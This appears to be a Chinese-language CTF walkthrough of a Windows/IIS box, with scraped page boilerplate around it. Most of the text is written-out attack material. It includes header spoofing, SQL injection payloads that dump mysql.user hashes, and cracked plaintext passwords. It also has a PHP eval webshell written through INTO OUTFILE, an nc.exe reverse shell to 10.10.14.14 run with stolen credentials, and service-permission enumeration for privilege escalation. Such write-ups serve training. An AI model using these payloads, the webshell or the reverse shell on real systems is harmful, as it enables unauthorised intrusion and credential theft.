代码拉取完成,页面将自动刷新
端口扫描只开放了80,135,3306
php + iis 点击admin、longin按钮都是admin.php。访问提示Access Denied: Header Missing. Please ensure you go through the proxy to access this page 查看首页源码发现 抓包添加X-Forwarded-For: 192.168.4.28请求头成功访问admin.php
在页面抓包点点看看。发现find products功能存在sql注入 输入1‘发现语句报错mariaDB,也就是mysql。继续尝试报错注入
productName=11'%20and%20updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#
得到数据库名warehouse,用户名manager,路径为c:
发现联合查询也可以。那就不用报错注入了,毕竟返回结果有长度限制不是那么方便
确定只有6列,发现都有回显
直接读取mysql的用户和密码
productName=0'%20union%20select%20group_concat(User),group_concat(Password)%20,3,4,5,6%20from%20mysql.user--+
user | password |
---|---|
root | *0A4A5CAD344718DC418035A1F4D292BA603134D8 |
manager | *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA |
hector | *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D |
使用john爆破
john --format=mysql-sha1 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
只有hector的爆出来了: l33th4x0rhector。但是直接连3306也连不上。
尝试往iis默认目录写shell
productName=0'%20union%20select%201,'<?php%20eval($_POST[cmd]);?>',3,4,5,6%20into%20outfile'c:/inetpub/wwwroot/yjh.php'--+
虽然有报错,但是访问证实是存在的 蚁剑成功连接,翻到manager的密码 manager : l3tm3!n
Fidelity
$user = "Fidelity\hector"
$pass = "l33th4x0rhector"
$secstr = New-Object -TypeName System.Security.SecureString
$pass.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $secstr
Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost
Invoke-Command -ScriptBlock { c:\temp\nc.exe -e cmd 10.10.14.14 1234 } -Credential $cred -Computer localhost
$user = "Fidelity\administrator"
$pass = "l3tm3!n"
$secstr = New-Object -TypeName System.Security.SecureString
$pass.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $secstr
Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost
下载winpeas.exe,发现powershell的历史操作 也可以通过执行
gc (Get-PSReadlineOption).HistorySavePath
$acl = Get-ACL -Path HKLM:\SYSTEM\CurrentControlSet\Services
ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}
$services = gci HKLM:\SYSTEM\CurrentControlSet\Services
foreach ($service in $services) { $sddl = (cmd /c sc sdshow $service)[1]; if ($sddl -match "RP[A-Z]*?;;;AU") { write-host $service,$sddl }}
后面的部分照抄wp也报错。不做了
Get-CimInstance win32_service | % {
$result = $_ | Invoke-CimMethod -Name StartService
[pscustomobject]@{
Result=$result.ReturnValue
Name=$_.Name
Account=$_.StartName
Startup=$_.StartMode
DisplayName=$_.Displayname
}
} | Sort Name | Where {
($_.Result -eq 0)`
-and ($_.Account -eq "LocalSystem")`
-and ($_.Startup -eq "Manual")
}
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。